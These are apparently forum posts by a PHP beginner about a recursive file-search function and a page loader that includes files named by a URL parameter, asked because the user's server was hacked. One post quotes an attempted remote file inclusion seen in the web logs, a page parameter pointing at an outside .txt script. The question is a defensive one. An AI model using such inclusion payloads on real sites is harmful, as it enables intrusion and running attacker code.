chokri

like i posted earlier, page count for my website is high - manually creating an array of page names is not an option. my question today basically was - does my code not inadvertantly do that anyway? because in order for a file to be read, it would have to be located in one of my directories. or did i miss something in my code that allows that whole step to be bypassed?

example: fileSearch("Events.php","/home/someWebsite/public_html/Content/") function fileSearch($target,$curdirLoc) { $fileFound = false; $compfileLoc = null; $curDir = scandir($curdirLoc); foreach($curDir as $curEntry) { if($curEntry != "." && $curEntry != "..") { $myLoc = $curdirLoc."/".$curEntry; if(is_file($myLoc)) { if(strcmp(substr($curEntry,2),$target) == 0) { $fileFound = true; return $myLoc; } } elseif(is_dir($myLoc)) { $compfileLoc=fileSearch($target,$myLoc); if($compfileLoc == true){return $compfileLoc;} } } } if(!$fileFound) {return null;} }

okay, please bear with me.. i'm trying to understand when the textfile would get executed. would it be in the include function? if that were the case, then i don't see how that is possible in my original code. example 1: pages.php?page=http://gak-pake.com/mail.txt my fileSearch() goes through a specific directory (and its subdirectories) looking for http://gak-pake.com/mail.txt.php. fileSearch() returns null since http://gak-pake.com/mail.txt.php is not found in my directory. since it's null, then include() is not even used. example 2: pages.php?page=Events my fileSearch() goes through a specific directory (and its subdirectories) looking for Events.php. fileSearch() returns the location of Events.php since the file is located in one of my subdirectories. in this case, include($contentFileLocation) is executed. i just assumed that would be a safeguard.. anyway, thank you so much for your help!! i'm a newbie to php, and just followed the manual to create my code, so my experience is very, very limited.

my problem is i have a lot of pages.. hence my need for the website to be dynamic. so my silly question of the day is: could i just write a script to search for all the page names in my directory then place them into an array, or would i actually have to list them manually? another question.. i've been trying to get my webhost to let me use mod_rewrite. by making my pages appear static, would that help the website become a wee bit more secure?

www.somewebsite.com/pages.php?page=thisPage <-- how pages are called on my website. my server's been hacked and i'm trying to figure out whether or not it's been through the website or not. i found out include() poses some security issues. on my webstats, i've noticed a couple of people trying something like: www.somewebsite.com/pages.php?page=http://gak-pake.com/mail.txt? when clicking on that link, you get the "page not found" message. based on my code below, would someone be able to run a random php script thus making my server somehow vunerable? $pageName = $_REQUEST["page"]; $fileName = $pageName.".php"; $contentFileLoc = fileSearch($fileName,getcwd()); //returns null if $fileName is not found if($contentFileLoc != null) {include($contentFileLoc);} else {echo "Page not found. Please refer to the <a href=pages.php?page=Sitemap>sitemap</a>. Thank you.";} side note: it was suggested i read: http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/ for php security tips. would anyone be able to recommend any other sites?

i spoke too soon. previously: if $compfileLoc = "c:\Inetpub\wwwroot\website\sitemap.php" [b]it works[/b] if $compfileLoc = "c:\Inetpub\wwwroot\website\Content\Contact_Us\Contact_Information.php" [b]it doesn't work[/b] after doing as you suggested orio, now it's: if $compfileLoc = "c:\Inetpub\wwwroot\website\sitemap.php" [b]it doesn't work[/b] if $compfileLoc = "c:\Inetpub\wwwroot\website\Content\Contact_Us\Contact_Information.php" [b]it works[/b]

YOU ROCK!  that worked. THANK YOU THANK YOU THANK YOU THANK YOU THANK YOU i ate many, many smarties trying to figure out what was wrong.

this is the first time i'm using php for website development.  i'm having issues with a fileSearch function i created to return a file's location.  the code is as follows: [code]  function fileSearch($tempFile,$curdirLoc)   {     $fileFound = false;     $compfileLoc = null;     $curDir = scandir($curdirLoc);     foreach($curDir as $curEntry)     {         if($curEntry != "." && $curEntry != "..") {   $myLoc = $curdirLoc."\\".$curEntry;           if(is_dir($myLoc))           {               fileSearch($tempFile,$myLoc);           }           else           {               if(strcmp($curEntry,$tempFile) == 0)               {                 $compfileLoc = $myLoc;                 $fileFound = true;               }           }         }     }     if($fileFound) {return $compfileLoc;}   }[/code] i know the code works and finds the file.  the problem is when returning $compfileLoc. if $compfileLoc = "c:\Inetpub\wwwroot\website\sitemap.php" it works if $compfileLoc = "c:\Inetpub\wwwroot\website\Content\Contact_Us\Contact_Information.php" it doesn't work. are there any limits to what can be returned?  i can't imagine the "\" causing problems since it works for some files.  i'd truly appreciate any help that can be provided!